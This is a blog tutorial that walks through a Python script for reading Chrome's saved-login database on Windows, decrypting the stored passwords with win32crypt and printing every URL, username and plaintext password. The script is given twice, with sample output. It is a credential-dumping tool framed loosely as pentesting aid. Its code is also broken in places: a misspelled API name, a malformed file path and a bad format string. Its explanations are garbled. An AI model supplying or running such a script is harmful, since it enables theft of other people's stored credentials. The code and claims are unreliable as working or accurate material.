Google Chrome has a built-in password manager function that stores all the passwords on both you’re in the cloud via an SQLite database file and local device from which you can get the passwords. You can use some Python code, some third-party libraries to siphon all this information and then decrypt it into plaintext passwords! In this beginner-friendly tutorial, we will write Python code to extract saved passwords from the Chrome browser on a Windows machine. This tutorial will help you to Extract stored Chrome Passwords and Decrypt them using Python.

But first, let’s discuss the purpose and background of this tutorial. On many operating systems, mainly Windows and MacOS, Google Chrome stores its users’ saved passwords in a database. Chrome has a built-in password manager function that stores all the passwords both in the cloud via an SQLite database file and on your local system, from which you can get the passwords. We going to some Python code, some third-party libraries, and a bit of elbow grease to extract all this information and then decrypt it into plaintext passwords!

This will be a Python script for extracting saved passwords from Google Chrome browser that may be used by anyone that’s into cyber security, network penetration testing, software security analysis, IT security auditing, or forensics. This can save lots of time since you don’t have to manually collect the list of saved passwords and their locations, you just need to run the script and it will do all the work for you.

For security reasons, Chrome stores its passwords in a very safe way, making them unreadable. So to retrieve the stored data from Chrome, we need to decrypt and simplify it a bit to make the database readable. To do that you’ll need win32crypt, which is a decoder and the most important part for this application to work; you can install it with the following command by running in the command prompt.

pip3 install pywin32

If you encounter any issues when upgrading, you can also try executing:

python3 Scripts/pywin32_postinstall.py -install

We are also going to be working with SQLite on this project but that is preinstalled in most Windows and Mac-based systems.

Coding the Application 

Now then, let’s get started making the application itself, but before making sure you have all the prerequisites specified above. Go onto your desired directory and create a file called passwords_extractor.py or anything you might want to and paste the following code in it:

import os
import sqlite3 
import win32crypt  

These are our starting blocks to do anything in the project; here we have imported  win32crypt, this is the main part that will help us get the password basically, sqlite3 for accessing the database and making SQL queries and os to get the database files.

def get_chrome(): 

data_path = os.path.expanduser('~') + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'

The def get_chrome(): function here will be our main function to get the database files stored deep inside your file system. The path above should work for almost every windows based system. 

The path on Mac-based systems should be something like this “~/Library/Application Support/Google/Chrome/(Default|{PROFILE})/Login Data

Note: If you want to make sure the path is correct (on windows at least) you can go to the file by pressing “win + r”, and a popup window should appear, type in “%APPDATA%”, hit enter and a file should appear. You can navigate here to see if the file, “Login Data” is here or not. 

c = sqlite3.connect(data_path)
# connecting to the database through the variable 'c'

cursor = c.cursor()
select_statment = 'SELECT origin_url, username_value, password_value FROM Logins'
# here we are using the 'SELECT' statement to get the values 'FROM' another value in the database provided above

cursor.execute(select_statment)
# this is to execute the SQL query and get the values from the database

login_data = cursor.fetchall()
# this is to fetch all data from the database

Here, select_statment inside this we are using the ‘SELECT’ statement to specify the data we need ‘FROM’ another value in the database called Logins. And after retrieving the data in this database, we can find every stored account from which we can recover its saved password in one go.

cred = {}

string = ''

for url, user_name, pwd in login_data:
pwd = win32crypt.CrypyUnprotectData(pwd)
cred[url] = (user_name, pwd[1].decode('utf8'))
# we have the pwd'[1]' above to index it to 1 because if we don't, we'll get some extra baggage which we don't require for this project
string += '\n[+] URL:%s USERNAME:%s PASSWORD:%\n' % (url,user_name,pwd[1]. decode('utf8'))
print(string)

Here in cred[url], we are specifying in what form we want the data to be in. Since the database was encrypted we are decrypting the data here as well through win32crypt which we imported all the up. Here we have also passed the data in a string value to make it show results in a clean one line.

if __name__=='__main__':
get_chrome()

And lastly, add this to end the function and print the results. Below is the implementation.

import os
import sqlite3 
# for accessing the database and doing SQL queries

import win32crypt 
# this is the main part that will help us get the password basically

def get_chrome(): 
# this will be our main function to get the passwords and user names

data_path = os.path.expanduser('~') + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'
# here 'r' is necessary to put in front of the path because it contains slashes '\'
# this is the path to the Chrome browser database where the passwords are stored on most Windows-based system

c = sqlite3.connect(data_path)
# connecting to the database through the variable 'c'

cursor = c.cursor()
select_statment = 'SELECT origin_url, username_value, password_value FROM Logins'
# here we are using the 'SELECT' statement to get the values 'FROM' another value in the database provided above

cursor.execute(select_statment)
# this is to execute the SQL query and get the values from the database

login_data = cursor.fetchall()
# this is to fetch all data from the database

cred = {}

string = ''

for url, user_name, pwd in login_data:
# here we are specifying what data we need from login_data
pwd = win32crypt.CrypyUnprotectData(pwd)
cred[url] = (user_name, pwd[1].decode('utf8'))
# we have the pwd'[1]' above to index it to 1 because if we don't, we'll get some extra baggage which we don't require for this project
string += '\n[+] URL:%s USERNAME:%s PASSWORD:%\n' % (url,user_name,pwd[1]. decode('utf8'))
# by doing this we'll get the results in a clean one-line string
print(string)


if __name__=='__main__':
get_chrome()

And it’s done, you can run it with python passwords_extractor.py or any name that may have been given to the file in the command prompt where you have kept your project file, run it and you should see a result something like this:

C:\Users\Windows\Desktop> python Password_extractor.py

[+] URL:https://accounts.google.com/signin/v2/s1/pwd USERNAME:admin.geekyhuman.com PASSWORD:GeekyHuman@123

[+] URL:https://accounts.google.com/signin/v2/s1/pwd USERNAME:admin.geekyhuman.com PASSWORD:GeekyHuman@123

Note: You must close chrome before executing the command or it will give you an error sqlite3.OprationalError: database is locked.

And that’s it! This is how you can Extract stored Chrome Passwords and Decrypt them using Python. I hope it was easy for you to understand and implement the code.

Here are some useful tutorials that you can read: